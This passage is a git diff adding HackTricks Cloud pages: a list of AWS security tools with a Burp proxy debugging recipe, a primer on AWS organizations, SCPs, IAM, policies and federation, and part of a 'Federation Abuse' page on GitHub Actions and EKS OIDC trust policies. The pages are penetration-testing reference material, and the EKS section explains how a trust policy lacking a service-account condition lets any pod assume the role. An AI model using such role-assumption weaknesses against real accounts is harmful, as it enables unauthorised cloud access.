+* [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
+* [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
+* [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
+
+## DEBUG: Capture AWS cli requests
+
+```bash
+# Set proxy
+export HTTP_PROXY=http://localhost:8080
+export HTTPS_PROXY=http://localhost:8080
+
+# Capture with burp nor verifying ssl
+aws --no-verify-ssl ...
+
+# Dowload brup cert and transform it to pem
+curl http://127.0.0.1:8080/cert --output Downloads/certificate.cer
+openssl x509 -inform der -in Downloads/certificate.cer -out Downloads/certificate.pem
+
+# Indicate the ca cert to trust
+export AWS_CA_BUNDLE=~/Downloads/certificate.pem
+
+# Run aws cli normally trusting burp cert
+aws ...
+```
+
+## References
+
+* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
+* [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-basic-information/README.md b/pentesting-cloud/aws-security/aws-basic-information/README.md
new file mode 100644
index 0000000000..a02cb59a18
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-basic-information/README.md
@@ -0,0 +1,410 @@
+# AWS - Basic Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Organization Hierarchy
+
+![](<../../../.gitbook/assets/image (151).png>)
+
+### Accounts
+
+In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them.
+
+This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments.
+
+Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts.
+
+*   The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following:
+
+    * Create accounts in the organization
+    * Invite other existing accounts to the organization
+    * Remove accounts from the organization
+    * Manage invitations
+    * Apply policies to entities (roots, OUs, or accounts) within the organization
+    * Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization.
+    * It's possible to login as the root user using the email and password used to create this root account/organization.
+
+    The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account.
+* **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account.
+  * Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it).
+
+```
+aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
+```
+
+### **Organization Units**
+
+Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children.
+
+```bash
+# You can get the root id from aws organizations list-roots
+aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
+```
+
+### Service Control Policy (SCP)
+
+A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**.
+
+This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\
+The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked).
+
+{% hint style="warning" %}
+Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account.
+{% endhint %}
+
+SCP examples:
+
+* Deny the root account entirely
+* Only allow specific regions
+* Only allow white-listed services
+*   Deny GuardDuty, CloudTrail, and S3 Public Block Access from
+
+    being disabled
+*   Deny security/incident response roles from being deleted or
+
+    modified.
+* Deny backups from being deleted.
+* Deny creating IAM users and access keys
+
+Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs\_manage\_policies\_scps\_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
+
+### ARN
+
+**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this:
+
+```
+arn:partition:service:region:account-id:resource-type/resource-id
+arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
+```
+
+Note that there are 4 partitions in AWS but only 3 ways to call them:
+
+* AWS Standard: `aws`
+* AWS China: `aws-cn`
+* AWS US public Internet (GovCloud): `aws-us-gov`
+* AWS Secret (US Classified): `aws`
+
+## IAM - Identity and Access Management
+
+IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
+
+* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
+* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
+* **Access Control** - The method and process of how access is granted to a secure resource
+
+IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
+
+### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) <a href="#id_root" id="id_root"></a>
+
+When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**.
+
+Note that a new **admin user** will have **less permissions that the root user**.
+
+From a security point of view, it's recommended to create other users and avoid using this one.
+
+### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) <a href="#id_iam-users" id="id_iam-users"></a>
+
+An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys).
+
+When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user.
+
+Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
+
+#### CLI
+
+* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
+* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
+
+Whenever you need to **change the Access Key** this is the process you should follow:\
+&#xNAN;_&#x43;reate a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
+
+### MFA - Multi Factor Authentication
+
+It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
+You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
+
+Policies with MFA conditions can be attached to the following:
+
+* An IAM user or group
+* A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic
+* The trust policy of an IAM role that can be assumed by a user
+
+If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\
+Note that **`AssumeRole` credentials don't contain this information**.
+
+```bash
+aws sts get-session-token --serial-number <arn_device> --token-code <code>
+```
+
+As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**.
+
+### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) <a href="#id_iam-groups" id="id_iam-groups"></a>
+
+An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**.
+
+You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities.
+
+Here are some important characteristics of user groups:
+
+* A user **group** can **contain many users**, and a **user** can **belong to multiple groups**.
+* **User groups can't be nested**; they can contain only users, not other user groups.
+* There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it.
+* The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
+
+### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) <a href="#id_iam-roles" id="id_iam-roles"></a>
+
+An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM.
+
+An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**.
+
+#### AWS Security Token Service (STS)
+
+AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for:
+
+### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) <a href="#id_temp-creds" id="id_temp-creds"></a>
+
+**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid.
+
+### Policies
+
+#### Policy Permissions
+
+Are used to assign permissions. There are 2 types:
+
+* AWS managed policies (preconfigured by AWS)
+* Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own..
+
+By **default access** is **denied**, access will be granted if an explicit role has been specified.\
+If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
+
+```javascript
+{
+    "Version": "2012-10-17",  //Version of the policy
+    "Statement": [  //Main element, there can be more than 1 entry in this array
+        {
+            "Sid": "Stmt32894y234276923" //Unique identifier (optional)
+            "Effect": "Allow", //Allow or deny
+            "Action": [  //Actions that will be allowed or denied
+                "ec2:AttachVolume",
+                "ec2:DetachVolume"
+            ], 
+            "Resource": [ //Resource the action and effect will be applied to
+                "arn:aws:ec2:*:*:volume/*",
+                "arn:aws:ec2:*:*:instance/*"
+            ],
+            "Condition": { //Optional element that allow to control when the permission will be effective
+                "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
+            }
+        }
+    ]
+}
+```
+
+The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
+The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
+
+#### Inline Policies
+
+This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\
+Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
+
+#### Resource Bucket Policies
+
+These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**.
+
+If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed.
+
+### IAM Boundaries
+
+IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them.
+
+A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do.
+
+**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs.
+
+### Session Policies
+
+A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has).
+
+This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised.
+
+```bash
+aws sts assume-role \
+    --role-arn <value> \
+    --role-session-name <value> \
+    [--policy-arns <arn_custom_policy1> <arn_custom_policy2>]
+    [--policy <file://policy.json>]
+```
+
+Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
+
+Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**.
+
+### Identity Federation
+
+Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
+An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS.
+
+To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role.
+
+However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other.
+
+<figure><img src="../../../.gitbook/assets/image (247).png" alt=""><figcaption></figcaption></figure>
+
+### IAM Identity Center
+
+AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications.
+
+The login domain is going to be something like `<user_input>.awsapps.com`.
+
+To login users, there are 3 identity sources that can be used:
+
+* Identity Center Directory: Regular AWS users
+* Active Directory: Supports different connectors
+* External Identity Provider: All users and groups come from an external Identity Provider (IdP)
+
+<figure><img src="../../../.gitbook/assets/image (279).png" alt=""><figcaption></figcaption></figure>
+
+In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization.
+
+In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account.
+
+#### AwsSSOInlinePolicy
+
+It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**.
+
+Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**.
+
+### Cross Account Trusts and Roles
+
+**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
+It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
+
+### AWS Simple AD
+
+Not supported:
+
+* Trust Relations
+* AD Admin Center
+* Full PS API support
+* AD Recycle Bin
+* Group Managed Service Accounts
+* Schema Extensions
+* No Direct access to OS or Instances
+
+#### Web Federation or OpenID Authentication
+
+The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
+
+### Other IAM options
+
+* You can **set a password policy setting** options like minimum length and password requirements.
+* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
+
+AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**.
+
+### IAM ID Prefixes
+
+In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature:
+
+| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html)                                                                                                          |
+| ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| ACCA | Context-specific credential                                                                                                                                                                                          |
+| AGPA | User group                                                                                                                                                                                                           |
+| AIDA | IAM user                                                                                                                                                                                                             |
+| AIPA | Amazon EC2 instance profile                                                                                                                                                                                          |
+| AKIA | Access key                                                                                                                                                                                                           |
+| ANPA | Managed policy                                                                                                                                                                                                       |
+| ANVA | Version in a managed policy                                                                                                                                                                                          |
+| APKA | Public key                                                                                                                                                                                                           |
+| AROA | Role                                                                                                                                                                                                                 |
+| ASCA | Certificate                                                                                                                                                                                                          |
+| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. |
+
+### Recommended permissions to audit accounts
+
+The following privileges grant various read access of metadata:
+
+* `arn:aws:iam::aws:policy/SecurityAudit`
+* `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess`
+* `codebuild:ListProjects`
+* `config:Describe*`
+* `cloudformation:ListStacks`
+* `logs:DescribeMetricFilters`
+* `directconnect:DescribeConnections`
+* `dynamodb:ListTables`
+
+## Misc
+
+### CLI Authentication
+
+In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\
+In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\
+Example of credentials file with more than 1 profile:
+
+```
+[default]
+aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
+aws_secret_access_key = uOcdhof683fbOUGFYEQug8fUGIf68greoihef
+
+[Admin]
+aws_access_key_id = AKIA8YDCu7TGTR356SHYT
+aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
+region = eu-west-2
+```
+
+If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn <role-arn> --role-session-name sessname`) and configure the credentials.
+
+You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
+A config file example:
+
+```
+[profile acc2]
+region=eu-west-2
+role_arn=arn:aws:iam::<account-id>:role/<role-path>
+role_session_name = <session_name>
+source_profile = <profile_with_assume_role>
+sts_regional_endpoints = regional
+```
+
+With this config file you can then use aws cli like:
+
+```
+aws --profile acc2 ...
+```
+
+If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
+
+## References
+
+* [https://docs.aws.amazon.com/organizations/latest/userguide/orgs\_getting-started\_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html)
+* [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/)
+* [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
new file mode 100644
index 0000000000..e4f155bd02
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -0,0 +1,155 @@
+# AWS - Federation Abuse
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SAML
+
+For info about SAML please check:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/saml-attacks" %}
+
+In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key)
+
+## OIDC - Github Actions Abuse
+
+In order to add a github action as Identity provider:
+
+1. For _Provider type_, select **OpenID Connect**.
+2. For _Provider URL_, enter `https://token.actions.githubusercontent.com`
+3. Click on _Get thumbprint_ to get the thumbprint of the provider
+4. For _Audience_, enter `sts.amazonaws.com`
+5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like:
+   * ```json
+     {
+       "Version": "2012-10-17",
+       "Statement": [
+         {
+           "Effect": "Allow",
+           "Principal": {
+             "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
+           },
+           "Action": "sts:AssumeRoleWithWebIdentity",
+           "Condition": {
+             "StringEquals": {
+               "token.actions.githubusercontent.com:sub": [
+                 "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
+                 "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
+               ],
+               "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
+             }
+           }
+         }
+       ]
+     }
+     ```
+6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**.
+7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**.
+8. Finally use a github action to configure the AWS creds to be used by the workflow:
+
+```yaml
+name: 'test AWS Access'
+ 
+# The workflow should only trigger on pull requests to the main branch
+on:
+  pull_request:
+    branches:
+      - main
+ 
+# Required to get the ID Token that will be used for OIDC
+permissions:
+  id-token: write
+  contents: read # needed for private repos to checkout
+ 
+jobs:
+  aws:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v3
+ 
+      - name: Configure AWS Credentials
+        uses: aws-actions/configure-aws-credentials@v1
+        with:
+          aws-region: eu-west-1
+          role-to-assume: ${{ secrets.READ_ROLE }}
+          role-session-name: OIDCSession
+ 
+      - run: aws sts get-caller-identity
+        shell: bash
+```
+
+## OIDC - EKS Abuse
+
+```bash
+# Crate an EKS cluster (~10min)
+eksctl create cluster --name demo --fargate
+```
+
+```bash
+# Create an Identity Provider for an EKS cluster
+eksctl utils associate-iam-oidc-provider --cluster Testing --approve
+```
+
+It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Principal": {
+                "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
+            },
+            "Action": "sts:AssumeRoleWithWebIdentity",
+            "Condition": {
+                "StringEquals": {
+                    "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
+                }
+            }
+        }
+    ]
+}
+```
+
+This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role.
+
+In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as:
+
+{% code overflow="wrap" %}
+```bash
+"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
+```
+{% endcode %}
+
+## References
+
+* [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
